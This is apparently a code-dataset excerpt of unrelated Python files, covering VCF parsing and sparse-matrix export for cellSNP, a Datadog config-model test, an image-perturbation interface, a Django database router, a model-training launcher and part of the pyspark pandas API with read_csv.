RV[format_list[k]].append(_line_key)
return RV
def load_VCF(vcf_file, biallelic_only=False, load_sample=True, sparse=True):
"""
Load whole VCF file
-------------------
Initially designed to load VCF from cellSNP output, requiring
1) all variants have the same format list;
2) a line starting with "#CHROM", with sample ids.
If these two requirements are satisfied, this function also supports general
VCF files, e.g., genotype for multiple samples.
    Note, it may use a lot of memory; please filter the VCF with bcftools first.
"""
if vcf_file[-3:] == ".gz" or vcf_file[-4:] == ".bgz":
infile = gzip.open(vcf_file, "rb")
is_gzip = True
else:
infile = open(vcf_file, "r")
is_gzip = False
FixedINFO = {}
contig_lines = []
comment_lines = []
var_ids, obs_ids, obs_dat = [], [], []
for line in infile:
if is_gzip:
line = line.decode('utf-8')
if line.startswith("#"):
if line.startswith("##contig="):
contig_lines.append(line.rstrip())
if line.startswith("#CHROM"):
obs_ids = line.rstrip().split("\t")[9:]
key_ids = line[1:].rstrip().split("\t")[:8]
for _key in key_ids:
FixedINFO[_key] = []
else:
comment_lines.append(line.rstrip())
else:
list_val = line.rstrip().split("\t") #[:5] #:8
if biallelic_only:
if len(list_val[3]) > 1 or len(list_val[4]) > 1:
continue
if load_sample:
obs_dat.append(list_val[8:])
for i in range(len(key_ids)):
FixedINFO[key_ids[i]].append(list_val[i])
var_ids.append("_".join([list_val[x] for x in [0, 1, 3, 4]]))
infile.close()
RV = {}
RV["variants"] = var_ids
RV["FixedINFO"] = FixedINFO
RV["samples"] = obs_ids
RV["GenoINFO"] = parse_sample_info(obs_dat, sparse=sparse)
RV["contigs"] = contig_lines
RV["comments"] = comment_lines
return RV
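# Example usage (hypothetical file name; a sketch only):
#     vcf_dat = load_VCF("cellSNP.cells.vcf.gz", biallelic_only=True, sparse=True)
#     AD_DP = read_sparse_GeneINFO(vcf_dat["GenoINFO"], keys=["AD", "DP"])
# With sparse=True the per-sample FORMAT tags are returned as CSR components
# (one data list per tag plus shared indices/indptr/shape), which
# read_sparse_GeneINFO below converts into scipy csr_matrix objects.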
def write_VCF_to_hdf5(VCF_dat, out_file):
"""
Write vcf data into hdf5 file
"""
import h5py
f = h5py.File(out_file, 'w')
f.create_dataset("contigs", data=np.string_(VCF_dat['contigs']),
compression="gzip", compression_opts=9)
f.create_dataset("samples", data=np.string_(VCF_dat['samples']),
compression="gzip", compression_opts=9)
f.create_dataset("variants", data=np.string_(VCF_dat['variants']),
compression="gzip", compression_opts=9)
f.create_dataset("comments", data=np.string_(VCF_dat['comments']),
compression="gzip", compression_opts=9)
## variant fixed information
fixed = f.create_group("FixedINFO")
for _key in VCF_dat['FixedINFO']:
fixed.create_dataset(_key, data=np.string_(VCF_dat['FixedINFO'][_key]),
compression="gzip", compression_opts=9)
## genotype information for each sample
geno = f.create_group("GenoINFO")
for _key in VCF_dat['GenoINFO']:
geno.create_dataset(_key, data=np.string_(VCF_dat['GenoINFO'][_key]),
compression="gzip", compression_opts=9)
f.close()
def read_sparse_GeneINFO(GenoINFO, keys=['AD', 'DP']):
M, N = np.array(GenoINFO['shape']).astype('int')
indptr = np.array(GenoINFO['indptr']).astype('int')
indices = np.array(GenoINFO['indices']).astype('int')
from scipy.sparse import csr_matrix
RV = {}
for _key in keys:
data = np.array(GenoINFO[_key]).astype('float')
RV[_key] = csr_matrix((data, indices, indptr), shape=(N, M))
return RV
def merge_vcf(out_file, out_files, hdf5_out=True):
"""Merge vcf for all chromsomes
"""
if out_file.endswith(".gz"):
out_file_use = out_file.split(".gz")[0]
else:
out_file_use = out_file
CNT = 0
fid_out = open(out_file_use, "w")
for _file in out_files:
with open(_file, "r") as fid_in:
for line in fid_in:
if line.startswith("#") and _file != out_files[0]:
continue
else:
CNT += 1
fid_out.writelines(line)
os.remove(_file)
fid_out.close()
print("[cellSNP] %d lines in final vcf file" %CNT)
import shutil
if shutil.which("bgzip") is not None:
bashCommand = "bgzip -f %s" %(out_file_use)
else:
bashCommand = "gzip -f %s" %(out_file_use)
pro = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)
pro.communicate()[0]
## save to hdf5 file
if hdf5_out:
vcf_dat = load_VCF(out_file_use + ".gz", load_sample=True, sparse=True)
write_VCF_to_hdf5(vcf_dat, out_file_use + ".h5")
return None
def VCF_to_sparseMat(vcf_file, tags=["AD", "DP"], out_dir=None):
"""
Write VCF sample info into sparse matrices with given tags
"""
# out samples, out_var, tag_files
var_info = []
tag_mat_list = []
for _tag in tags:
_dict = {"data": [], "row": [], "col": []}
tag_mat_list.append(_dict)
if vcf_file[-3:] == ".gz" or vcf_file[-4:] == ".bgz":
infile = gzip.open(vcf_file, "rb")
is_gzip = True
else:
infile = open(vcf_file, "r")
is_gzip = False
var_idx, obs_idx = 0, 0
for line in infile:
if is_gzip:
line = line.decode('utf-8')
if line.startswith("#"):
if line.startswith("#CHROM"):
samples = line.rstrip().split("\t")[9:]
continue
## variants line
var_idx += 1
list_val = line.rstrip().split("\t")
var_info.append(list_val[:8])
FORMAT = list_val[8].split(":")
tag_idx = []
for _tag in tags:
if _tag in FORMAT:
tag_idx.append(FORMAT.index(_tag))
else:
tag_idx.append(None)
for obs_idx in range(len(list_val[9:])):
_samp_dat = list_val[9 + obs_idx]
if _samp_dat == ".":
continue
_samp_val = _samp_dat.split(":")
for ii in range(len(tags)):
if tag_idx[ii] is None:
continue
tag_dat = _samp_val[tag_idx[ii]]
if (tag_dat != "." and tag_dat != "0" and
tag_dat.count(".,") == 0):
tag_mat_list[ii]["data"].append(tag_dat)
tag_mat_list[ii]["row"].append(var_idx)
tag_mat_list[ii]["col"].append(obs_idx + 1)
infile.close()
if out_dir is not None:
if not os.path.exists(out_dir):
os.mkdir(out_dir)
fid_obs = open(out_dir + "/cellSNP.samples.tsv", "w")
fid_obs.writelines("\n".join(samples) + "\n")
fid_obs.close()
fid_var = open(out_dir + "/cellSNP.base.vcf", "w")
fid_var.writelines("##fileformat=VCFv4.2\n")
fid_var.writelines("#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n")
for _var_info in var_info:
fid_var.writelines("\t".join(_var_info) + "\n")
fid_var.close()
try:
import shutil
if shutil.which("bgzip") is not None:
bashCommand = "bgzip -f %s" %(out_dir + "/cellSNP.base.vcf")
else:
bashCommand = "gzip -f %s" %(out_dir + "/cellSNP.base.vcf")
pro = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)
pro.communicate()[0]
except:
print("sparse matrix: VCF uncmpressed.")
for ii in range(len(tags)):
_mat = tag_mat_list[ii]
_dat = _mat["data"]
_row = _mat["row"]
_col = _mat["col"]
fid = open(out_dir + "/cellSNP.tag.%s.mtx" %(tags[ii]), "w")
fid.writelines("%" +
"%MatrixMarket matrix coordinate integer general\n")
fid.writelines("%\n")
fid.writelines("%d\t%d\t%d\n" %(len(var_info), len(samples),
len(_dat)))
for jj in range(len(_dat)):
fid.writelines("%d\t%d\t%s\n" %(_row[jj], _col[jj], _dat[jj]))
fid.close()
return var_info, samples, tag_mat_list
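# Reading the written matrices back (a sketch; assumes scipy is available):
#     from scipy.io import mmread
#     AD = mmread(out_dir + "/cellSNP.tag.AD.mtx").tocsr()
#     DP = mmread(out_dir + "/cellSNP.tag.DP.mtx").tocsr()
# Rows correspond to the variants written to cellSNP.base.vcf and columns to
# the sample ids in cellSNP.samples.tsv (both produced when out_dir is set).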
|
py | 1a4b99a7818ba7e6c100010ed1166f0167e82822 | # (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import pytest
from datadog_checks.dev.tooling.configuration.consumers.model.model_consumer import VALIDATORS_DOCUMENTATION
from ...utils import get_model_consumer, normalize_yaml
pytestmark = [pytest.mark.conf, pytest.mark.conf_consumer, pytest.mark.conf_consumer_model]
def test():
consumer = get_model_consumer(
"""
name: test
version: 0.0.0
files:
- name: test.yaml
options:
- template: instances
options:
- name: foo
required: true
description: words
value:
type: string
- name: example
description: words
value:
example: bar
type: string
- name: default_precedence
description: words
value:
example: bar
default: baz
type: string
- name: example_ignored_array
description: words
value:
example:
- test
type: array
items:
type: string
- name: example_ignored_object
description: words
value:
example:
key: value
type: object
additionalProperties: true
- name: long_default_formatted
description: words
value:
default:
- ["01", "02", "03", "04", "05"]
- ["06", "07", "08", "09", "10"]
- ["11", "12", "13", "14", "15"]
- ["16", "17", "18", "19", "20"]
- ["21", "22", "23", "24", "25"]
type: array
items:
type: array
items:
type: string
"""
)
model_definitions = consumer.render()
assert len(model_definitions) == 1
files = model_definitions['test.yaml']
assert len(files) == 4
validators_contents, validators_errors = files['validators.py']
assert not validators_errors
assert validators_contents == VALIDATORS_DOCUMENTATION
package_root_contents, package_root_errors = files['__init__.py']
assert not package_root_errors
assert package_root_contents == normalize_yaml(
"""
from .instance import InstanceConfig
class ConfigMixin:
_config_model_instance: InstanceConfig
@property
def config(self) -> InstanceConfig:
return self._config_model_instance
"""
)
defaults_contents, defaults_errors = files['defaults.py']
assert not defaults_errors
assert defaults_contents == normalize_yaml(
"""
from datadog_checks.base.utils.models.fields import get_default_field_value
def instance_default_precedence(field, value):
return 'baz'
def instance_example(field, value):
return 'bar'
def instance_example_ignored_array(field, value):
return get_default_field_value(field, value)
def instance_example_ignored_object(field, value):
return get_default_field_value(field, value)
def instance_long_default_formatted(field, value):
return [
['01', '02', '03', '04', '05'],
['06', '07', '08', '09', '10'],
['11', '12', '13', '14', '15'],
['16', '17', '18', '19', '20'],
['21', '22', '23', '24', '25'],
]
"""
)
instance_model_contents, instance_model_errors = files['instance.py']
assert not instance_model_errors
assert instance_model_contents == normalize_yaml(
"""
from __future__ import annotations
from typing import Any, Mapping, Optional, Sequence
from pydantic import BaseModel, root_validator, validator
from datadog_checks.base.utils.functions import identity
from datadog_checks.base.utils.models import validation
from . import defaults, validators
class InstanceConfig(BaseModel):
class Config:
allow_mutation = False
default_precedence: Optional[str]
example: Optional[str]
example_ignored_array: Optional[Sequence[str]]
example_ignored_object: Optional[Mapping[str, Any]]
foo: str
long_default_formatted: Optional[Sequence[Sequence[str]]]
@root_validator(pre=True)
def _initial_validation(cls, values):
return validation.core.initialize_config(getattr(validators, 'initialize_instance', identity)(values))
@validator('*', pre=True, always=True)
def _ensure_defaults(cls, v, field):
if v is not None or field.required:
return v
return getattr(defaults, f'instance_{field.name}')(field, v)
@validator('*')
def _run_validations(cls, v, field):
if not v:
return v
return getattr(validators, f'instance_{field.name}', identity)(v, field=field)
@root_validator(pre=False)
def _final_validation(cls, values):
return validation.core.finalize_config(getattr(validators, 'finalize_instance', identity)(values))
"""
)
|
py | 1a4b9ae61f7c19175e5ec4161f1bb6b1d3db7e25 | import abc
from typing import List, Tuple
import numpy as np
import PIL.Image
from smqtk_core import Plugfigurable
class PerturbImage (Plugfigurable):
"""
Interface abstracting the behavior of taking a reference image and
generating some number perturbations of the image along with paired mask
matrices indicating where perturbations have occurred and to what amount.
Implementations should impart no side effects upon the input image.
"""
@abc.abstractmethod
def perturb(
self,
ref_image: PIL.Image.Image
) -> Tuple[List[PIL.Image.Image], np.ndarray]:
"""
Transform an input reference image into a number of perturbed
variations along with mask matrices indicating the perturbed regions.
Output images should have the same shape as the input reference image,
including channels.
The output masks array should be of the shape `[nOutputs, H, W]`, where
`nOutputs` is the same number of output image perturbations, and `H`
and `W` are the pixel height and width of the input and output images.
Output mask matrices should be congruent in length to the number of
perturbed images output, as well as share the same height and width
dimensions.
These masks should indicate the regions in the corresponding perturbed
image that has been modified.
Values should be in the [0, 1] range, where a value closer to 1.0
        indicates areas of the image that are *unperturbed*.
Note that output mask matrices *may be* of a floating-point type in
order to allow for fractional perturbation.
:param ref_image:
Reference image to generate perturbations from.
:return: Tuple of perturbed images and the masks detailing perturbation
areas.
"""
def __call__(
self,
ref_image: PIL.Image.Image
) -> Tuple[List[PIL.Image.Image], np.ndarray]:
"""
Alias for :meth:`.PerturbImage.perturb`.
"""
return self.perturb(ref_image)
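# A minimal illustrative subclass (an assumed sketch, not part of this package):
# it yields a single unmodified copy of the reference image together with an
# all-ones mask, which by the contract above marks every pixel as unperturbed.
class _IdentityPerturb (PerturbImage):

    def perturb(
        self,
        ref_image: PIL.Image.Image
    ) -> Tuple[List[PIL.Image.Image], np.ndarray]:
        # One "perturbation" that is just a copy of the input; mask values of
        # 1.0 denote unperturbed regions per the interface documentation.
        masks = np.ones((1, ref_image.height, ref_image.width), dtype=np.float32)
        return [ref_image.copy()], masks

    def get_config(self) -> dict:
        # Assumed to be required by the Configurable side of Plugfigurable:
        # return the constructor keyword arguments for this instance.
        return {}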
|
py | 1a4b9b4ac893bd6347c977ae54d40fa7d8af0142 | import typing
import sys
import numpy as np
import numba as nb
@nb.njit
def sort_csgraph(
n: int,
g: np.ndarray,
) -> typing.Tuple[np.ndarray, np.ndarray, np.ndarray]:
sort_idx = np.argsort(g[:, 0], kind='mergesort')
g = g[sort_idx]
edge_idx = np.searchsorted(g[:, 0], np.arange(n + 1))
original_idx = np.arange(len(g))[sort_idx]
return g, edge_idx, original_idx
@nb.njit
def csgraph_to_undirected(g: np.ndarray) -> np.ndarray:
m = len(g)
g = np.vstack((g, g))
g[m:, :2] = g[m:, 1::-1]
return g
@nb.njit((nb.i8, nb.i8[:, :]), cache=True)
def connected_components_bfs(n: int, g: np.ndarray):
g = csgraph_to_undirected(g)
g, edge_idx, _ = sort_csgraph(n, g)
label = np.full(n, -1, np.int64)
l = 0
for i in range(n):
if label[i] != -1: continue
label[i] = l
que = [i]
for u in que:
for v in g[edge_idx[u]:edge_idx[u + 1], 1]:
if label[v] != -1: continue
label[v] = l
que.append(v)
l += 1
return label
@nb.njit((nb.i8[:], ), cache=True)
def solve(a: np.ndarray) -> typing.NoReturn:
n = a.size
a = np.searchsorted(np.unique(a), a)
m = a.max() + 1
g = np.empty((n, 2), np.int64)
idx_to_add = 0
def add_edge(u, v):
nonlocal idx_to_add
g[idx_to_add] = (u, v)
idx_to_add += 1
for i in range(n // 2):
x, y = a[i], a[n - 1 - i]
add_edge(x, y)
add_edge(y, x)
g = g[:idx_to_add]
label = connected_components_bfs(m, g)
print(m - label.max() - 1)
def main() -> typing.NoReturn:
n = int(input())
a = np.array(
sys.stdin.readline().split(),
dtype=np.int64,
)
solve(a)
main() |
py | 1a4b9b919e1c22bf2de6b661614af3d21326e947 | #!/usr/bin/env python3
import argparse
import os
import sys
import numpy as np
from functools import reduce
from collections import OrderedDict
import pandas as pd
## merge filtered/summarized files with qsim values by user-specified comparison
def getOptions():
parser = argparse.ArgumentParser(description='Merges together filtered/summarized comparate count tables by user-specified comparison')
parser.add_argument("-output", "--output", dest="output", action="store", required=True, help="Output directory for complete merged comparate files ready for Bayesian")
parser.add_argument("-comp", "--comp", dest="comp", action='store', required=True, help="Input filtered/summarized count tables per one comparate")
parser.add_argument("-design", "--design", dest="design", action='store', required=True, help="Design file")
args=parser.parse_args()
return(args)
def main():
args = getOptions()
### Read in design file as dataframe
df_design = pd.read_csv(args.design)
### Create subset of design file of comparate specification columns (will quantify # comparates by number of columns left)
### Store compID to name output file
c1_g1_list = df_design['C1_G1'].tolist()
c1_g2_list = df_design['C1_G2'].tolist()
c2_g1_list = df_design['C2_G1'].tolist()
c2_g2_list = df_design['C2_G2'].tolist()
c1_list = df_design['Comparate_1'].tolist()
c2_list = df_design['Comparate_2'].tolist()
del df_design['C1_G1']
del df_design['C1_G2']
del df_design['C2_G1']
del df_design['C2_G2']
dict = {}
col_list = list(df_design.columns.values)
row_list = []
comparison_list = df_design['compID'].tolist()
del df_design['compID']
### Create dictionaries per design file row to store the row's comparate files
for index, sample in df_design.iterrows():
dict[index] = list(sample)
## If there are comparison columns (column # > 1)
for key in dict:
row_list = dict[key]
file_list = []
comp_dict = {}
comparison = comparison_list[key]
c1_g1= c1_g1_list[key]
c1_g2= c1_g2_list[key]
c2_g1= c2_g1_list[key]
c2_g2= c2_g2_list[key]
c1= c1_list[key]
c2= c2_list[key]
for i, comp in enumerate(row_list):
comp_dict[i+1] = comp
### Assign filename so it can be called
row_list[i] = args.comp + '/bayesian_input_' + comp + '.csv'
file = pd.read_csv(row_list[i], index_col=None, header =0)
file_list.append(file)
df_merged = reduce(lambda x, y: pd.merge(x, y, on = ['FEATURE_ID']), file_list)
### drop columns you don't want before merge
df_merged = df_merged[df_merged.columns.drop(list(df_merged.filter(regex='comp')))]
df_merged.set_index('FEATURE_ID', inplace=True)
        ## AMM fix: get_values() is deprecated, so use to_numpy() instead (old line kept below)
## merged_headers = list(df_merged.columns.get_values())
merged_headers = list(df_merged.columns.to_numpy())
### For stan model, requires headers to have general comparate input names
### This reassigns comparate names to be c1, c2, c3... depending on design file specifications
for x in comp_dict:
for i in range(len(merged_headers)):
if c1 in merged_headers[i]:
merged_headers[i] = merged_headers[i].replace(c1, 'c1')
if c2 in merged_headers[i]:
merged_headers[i] = merged_headers[i].replace(c2, 'c2')
df_merged.columns=merged_headers
df_filtered = df_merged
outfile = args.output + '/bayesian_input_' + comparison + '.csv'
df_filtered.to_csv(outfile)
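# Hedged illustration (assumption, not executed by the script): how comparate-specific
# column headers are generalized to c1/c2 before the Bayesian stage. The header and
# comparate names below are made up.
def _example_header_rename():
    headers = ["mean_treated", "mean_control", "flag_treated"]
    c1, c2 = "treated", "control"  # hypothetical Comparate_1 / Comparate_2 values
    renamed = [h.replace(c1, "c1").replace(c2, "c2") for h in headers]
    return renamed  # ['mean_c1', 'mean_c2', 'flag_c1']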
if __name__=='__main__':
main()
|
py | 1a4ba152976199170d56acb417db2a69860562ab | import torch
print('Creating tensor...')
t = torch.ones(10).cuda()
print(t)
|
py | 1a4ba37dc62bd0a0abdf068b7b3c8abe03570890 | from django.conf import settings
IS_TEST = False
TEST_FLAG = '__TEST'
class DbRouterMiddleware(object):
def process_request( self, request):
global IS_TEST
IS_TEST = request.GET.get(TEST_FLAG)
return None
def process_response( self, request, response ):
global IS_TEST
IS_TEST = False
return response
class DatabaseRouter (object):
# def db_for_read( self, model, **hints ):
# return 'test' if IS_TEST else 'default';
#
# def db_for_write( self, model, **hints ):
# return 'test' if IS_TEST else 'default';
#
# def allow_relation( self, obj1, obj2, **hints ):
# return True
#
# def allow_migrate( self, db, app_label, model_name=None, **hints ):
# return True
    def db_for_read(self, model, **hints):
        """Point all read operations to the specific database."""
if model._meta.app_label in settings.DATABASE_APPS_MAPPING:
return settings.DATABASE_APPS_MAPPING[model._meta.app_label]
        return 'test' if IS_TEST else 'default'
def db_for_write(self, model, **hints):
"""Point all write operations to the specific database."""
if model._meta.app_label in settings.DATABASE_APPS_MAPPING:
return settings.DATABASE_APPS_MAPPING[model._meta.app_label]
        return 'test' if IS_TEST else 'default'
def allow_relation(self, obj1, obj2, **hints):
"""Allow any relation between apps that use the same database."""
db_obj1 = settings.DATABASE_APPS_MAPPING.get(obj1._meta.app_label)
db_obj2 = settings.DATABASE_APPS_MAPPING.get(obj2._meta.app_label)
if db_obj1 and db_obj2:
if db_obj1 == db_obj2:
return True
else:
return False
return True
    def allow_migrate(self, db, app_label, model_name=None, **hints):
        """Make sure that apps only appear in their related database.

        Never allow migrations on the 'no_sql' database, and never migrate the
        'no_sql' app on any other database."""
        if db == 'no_sql' or app_label == "no_sql":
            return False
else:
return True
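# Hedged configuration sketch (assumption, not taken from the original project): the
# middleware and router above expect settings roughly like the ones returned here.
# Module paths and database aliases other than 'default', 'test' and 'no_sql' are
# placeholders.
def _example_settings_sketch():
    return {
        "DATABASE_APPS_MAPPING": {"no_sql": "no_sql"},
        "DATABASE_ROUTERS": ["myproject.db_router.DatabaseRouter"],
        "MIDDLEWARE": ["myproject.db_router.DbRouterMiddleware"],
    }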
|
py | 1a4ba41fc1245728fd3d5c74916fd5dae741e46d | import os
from BEA.demo.preprocess import preprocess, output_folder
if __name__ == "__main__":
train = True
    # 1. Modify the paths in the nnUNet path file
    # 2. Modify the paths in the preprocess file
preprocess() # only run one time
# Training
# Also cd BEA_package/BEA/run
# Run nohup python run_training.py -gpu='0' -outpath='BEA' -task 026 2>&1 & for training.
if train:
os.system('/home/wyh/anaconda3/envs/BSG/bin/python -u /homeb/wyh/Codes/BEA-Net/BEA_package/BEA/run/run_training.py'
' -gpu=\'0\' -outpath=\'BEA\' -task 026')
# Testing
# Also cd BEA_package/BEA/run
    # Run nohup python run_training.py -gpu='0' -outpath='BEA' -task 026 -val 2>&1 & for testing.
else:
os.system(
'/home/wyh/anaconda3/envs/BSG/bin/python -u /homeb/wyh/Codes/BEA-Net/BEA_package/BEA/run/run_training.py'
' -gpu=\'0\' -outpath=\'BEA\' -task 026 -val')
|
py | 1a4ba49514ab0f068863e5cba42aee6f3fc63b03 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Wrappers around spark that correspond to common pandas functions.
"""
from typing import Any, Optional, Union, List, Tuple, Sized, cast
from collections import OrderedDict
from collections.abc import Iterable
from distutils.version import LooseVersion
from functools import reduce
from io import BytesIO
import json
import numpy as np
import pandas as pd
from pandas.api.types import is_datetime64_dtype, is_datetime64tz_dtype, is_list_like
import pyarrow as pa
import pyarrow.parquet as pq
import pyspark
from pyspark import sql as spark
from pyspark.sql import functions as F
from pyspark.sql.functions import pandas_udf, PandasUDFType
from pyspark.sql.types import (
ByteType,
ShortType,
IntegerType,
LongType,
FloatType,
DoubleType,
BooleanType,
TimestampType,
DecimalType,
StringType,
DateType,
StructType,
)
from pyspark import pandas as pp # noqa: F401
from pyspark.pandas.base import IndexOpsMixin
from pyspark.pandas.utils import (
align_diff_frames,
default_session,
is_name_like_tuple,
name_like_string,
same_anchor,
scol_for,
validate_axis,
)
from pyspark.pandas.frame import DataFrame, _reduce_spark_multi
from pyspark.pandas.internal import (
InternalFrame,
DEFAULT_SERIES_NAME,
HIDDEN_COLUMNS,
)
from pyspark.pandas.series import Series, first_series
from pyspark.pandas.spark.utils import as_nullable_spark_type, force_decimal_precision_scale
from pyspark.pandas.indexes import Index, DatetimeIndex
__all__ = [
"from_pandas",
"range",
"read_csv",
"read_delta",
"read_table",
"read_spark_io",
"read_parquet",
"read_clipboard",
"read_excel",
"read_html",
"to_datetime",
"date_range",
"get_dummies",
"concat",
"melt",
"isna",
"isnull",
"notna",
"notnull",
"read_sql_table",
"read_sql_query",
"read_sql",
"read_json",
"merge",
"to_numeric",
"broadcast",
"read_orc",
]
def from_pandas(pobj: Union[pd.DataFrame, pd.Series, pd.Index]) -> Union[Series, DataFrame, Index]:
"""Create a Koalas DataFrame, Series or Index from a pandas DataFrame, Series or Index.
This is similar to Spark's `SparkSession.createDataFrame()` with pandas DataFrame,
but this also works with pandas Series and picks the index.
Parameters
----------
pobj : pandas.DataFrame or pandas.Series
pandas DataFrame or Series to read.
Returns
-------
Series or DataFrame
If a pandas Series is passed in, this function returns a Koalas Series.
If a pandas DataFrame is passed in, this function returns a Koalas DataFrame.
"""
if isinstance(pobj, pd.Series):
return Series(pobj)
elif isinstance(pobj, pd.DataFrame):
return DataFrame(pobj)
elif isinstance(pobj, pd.Index):
return DataFrame(pd.DataFrame(index=pobj)).index
else:
raise ValueError("Unknown data type: {}".format(type(pobj).__name__))
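# Hedged usage sketch (illustrative, not part of the module): round-trip a small pandas
# DataFrame through from_pandas. Assumes an active Spark session via default_session().
def _example_from_pandas_sketch():
    pdf = pd.DataFrame({"x": [1, 2, 3]}, index=["a", "b", "c"])
    kdf = from_pandas(pdf)  # Koalas DataFrame backed by a Spark DataFrame
    return kdf.to_pandas()  # back to pandas; the index is preserved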
_range = range # built-in range
def range(
start: int, end: Optional[int] = None, step: int = 1, num_partitions: Optional[int] = None
) -> DataFrame:
"""
Create a DataFrame with some range of numbers.
The resulting DataFrame has a single int64 column named `id`, containing elements in a range
from ``start`` to ``end`` (exclusive) with step value ``step``. If only the first parameter
(i.e. start) is specified, we treat it as the end value with the start value being 0.
This is similar to the range function in SparkSession and is used primarily for testing.
Parameters
----------
start : int
the start value (inclusive)
end : int, optional
the end value (exclusive)
step : int, optional, default 1
the incremental step
num_partitions : int, optional
the number of partitions of the DataFrame
Returns
-------
DataFrame
Examples
--------
When the first parameter is specified, we generate a range of values up till that number.
>>> pp.range(5)
id
0 0
1 1
2 2
3 3
4 4
When start, end, and step are specified:
>>> pp.range(start = 100, end = 200, step = 20)
id
0 100
1 120
2 140
3 160
4 180
"""
sdf = default_session().range(start=start, end=end, step=step, numPartitions=num_partitions)
return DataFrame(sdf)
def read_csv(
path,
sep=",",
header="infer",
names=None,
index_col=None,
usecols=None,
squeeze=False,
mangle_dupe_cols=True,
dtype=None,
nrows=None,
parse_dates=False,
quotechar=None,
escapechar=None,
comment=None,
**options
) -> Union[DataFrame, Series]:
"""Read CSV (comma-separated) file into DataFrame or Series.
Parameters
----------
path : str
The path string storing the CSV file to be read.
sep : str, default ‘,’
Delimiter to use. Must be a single character.
header : int, list of int, default ‘infer’
        Row number(s) to use as the column names, and the start of the data.
Default behavior is to infer the column names: if no names are passed
the behavior is identical to `header=0` and column names are inferred from
the first line of the file, if column names are passed explicitly then
the behavior is identical to `header=None`. Explicitly pass `header=0` to be
able to replace existing names
names : str or array-like, optional
List of column names to use. If file contains no header row, then you should
explicitly pass `header=None`. Duplicates in this list will cause an error to be issued.
If a string is given, it should be a DDL-formatted string in Spark SQL, which is
preferred to avoid schema inference for better performance.
index_col: str or list of str, optional, default: None
Index column of table in Spark.
usecols : list-like or callable, optional
Return a subset of the columns. If list-like, all elements must either be
positional (i.e. integer indices into the document columns) or strings that
correspond to column names provided either by the user in names or inferred
from the document header row(s).
If callable, the callable function will be evaluated against the column names,
returning names where the callable function evaluates to `True`.
squeeze : bool, default False
If the parsed data only contains one column then return a Series.
mangle_dupe_cols : bool, default True
Duplicate columns will be specified as 'X0', 'X1', ... 'XN', rather
than 'X' ... 'X'. Passing in False will cause data to be overwritten if
there are duplicate names in the columns.
Currently only `True` is allowed.
dtype : Type name or dict of column -> type, default None
Data type for data or columns. E.g. {‘a’: np.float64, ‘b’: np.int32} Use str or object
together with suitable na_values settings to preserve and not interpret dtype.
nrows : int, default None
Number of rows to read from the CSV file.
parse_dates : boolean or list of ints or names or list of lists or dict, default `False`.
Currently only `False` is allowed.
quotechar : str (length 1), optional
The character used to denote the start and end of a quoted item. Quoted items can include
the delimiter and it will be ignored.
escapechar : str (length 1), default None
One-character string used to escape delimiter
comment: str, optional
Indicates the line should not be parsed.
options : dict
All other options passed directly into Spark's data source.
Returns
-------
DataFrame or Series
See Also
--------
DataFrame.to_csv : Write DataFrame to a comma-separated values (csv) file.
Examples
--------
>>> pp.read_csv('data.csv') # doctest: +SKIP
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
if mangle_dupe_cols is not True:
raise ValueError("mangle_dupe_cols can only be `True`: %s" % mangle_dupe_cols)
if parse_dates is not False:
raise ValueError("parse_dates can only be `False`: %s" % parse_dates)
if usecols is not None and not callable(usecols):
usecols = list(usecols)
if usecols is None or callable(usecols) or len(usecols) > 0:
reader = default_session().read
reader.option("inferSchema", True)
reader.option("sep", sep)
if header == "infer":
header = 0 if names is None else None
if header == 0:
reader.option("header", True)
elif header is None:
reader.option("header", False)
else:
raise ValueError("Unknown header argument {}".format(header))
if quotechar is not None:
reader.option("quote", quotechar)
if escapechar is not None:
reader.option("escape", escapechar)
if comment is not None:
if not isinstance(comment, str) or len(comment) != 1:
raise ValueError("Only length-1 comment characters supported")
reader.option("comment", comment)
reader.options(**options)
if isinstance(names, str):
sdf = reader.schema(names).csv(path)
column_labels = OrderedDict((col, col) for col in sdf.columns)
else:
sdf = reader.csv(path)
if is_list_like(names):
names = list(names)
if len(set(names)) != len(names):
raise ValueError("Found non-unique column index")
if len(names) != len(sdf.columns):
raise ValueError(
"The number of names [%s] does not match the number "
"of columns [%d]. Try names by a Spark SQL DDL-formatted "
"string." % (len(sdf.schema), len(names))
)
column_labels = OrderedDict(zip(names, sdf.columns))
elif header is None:
column_labels = OrderedDict(enumerate(sdf.columns))
else:
column_labels = OrderedDict((col, col) for col in sdf.columns)
if usecols is not None:
if callable(usecols):
column_labels = OrderedDict(
(label, col) for label, col in column_labels.items() if usecols(label)
)
missing = []
elif all(isinstance(col, int) for col in usecols):
new_column_labels = OrderedDict(
(label, col)
for i, (label, col) in enumerate(column_labels.items())
if i in usecols
)
missing = [
col
for col in usecols
if col >= len(column_labels)
or list(column_labels)[col] not in new_column_labels
]
column_labels = new_column_labels
elif all(isinstance(col, str) for col in usecols):
new_column_labels = OrderedDict(
(label, col) for label, col in column_labels.items() if label in usecols
)
missing = [col for col in usecols if col not in new_column_labels]
column_labels = new_column_labels
else:
raise ValueError(
"'usecols' must either be list-like of all strings, "
"all unicode, all integers or a callable."
)
if len(missing) > 0:
raise ValueError(
"Usecols do not match columns, columns expected but not " "found: %s" % missing
)
if len(column_labels) > 0:
sdf = sdf.select([scol_for(sdf, col) for col in column_labels.values()])
else:
sdf = default_session().createDataFrame([], schema=StructType())
else:
sdf = default_session().createDataFrame([], schema=StructType())
column_labels = OrderedDict()
if nrows is not None:
sdf = sdf.limit(nrows)
if index_col is not None:
if isinstance(index_col, (str, int)):
index_col = [index_col]
for col in index_col:
if col not in column_labels:
raise KeyError(col)
index_spark_column_names = [column_labels[col] for col in index_col]
index_names = [(col,) for col in index_col] # type: List[Tuple]
